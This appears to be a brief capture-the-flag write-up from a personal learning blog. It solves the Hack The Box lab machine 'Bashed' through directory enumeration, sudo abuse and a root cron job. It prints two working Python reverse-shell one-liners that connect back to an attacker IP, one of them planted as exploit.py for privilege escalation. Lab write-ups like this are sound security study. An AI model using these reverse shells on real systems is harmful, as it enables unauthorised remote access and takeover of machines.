https://app.hackthebox.com/machines/Bashed
Review
- Directory enumeration gives a browser based terminal for initial access.
- Run a python reverse shell to gain user access in Kali.
- Running SUDO permission without a password execute the user “scriptmanager” without specifying a password.
- The /scripts folder runs .py files as a cronjob as root.
- Create a python file with a reverse shell and root access will be gained.
Enumeration
Run nmap scan to find for open ports.
Port 80 shows us the following.
Run a gobuster scan to find for hidden dirrectories.
/dev/ gives us the following.
A browser based linux terminal.
The user arrexel has the user.txt file.
Foothold
Use a python reverse shell script to spawn a shell in kali.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Start a netcat listener .
sudo -l indicates we are able to use sudo on scriptmanager.
Spawn a python shell and and run sudo on scriptmanager.
Find the scripts folder.
To check if its a cron job , i tried removing the test.txt file but unable to do so. Rename the file and after some time a new test.txt file appears.
This machine seems to run .py files as a cron job and also done by root.
Privilege escalation
Let’s create a new python script with a reverse shell to our machine.
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py
Root shell is gained.
The final flag is found.
Persecure : my learning archive 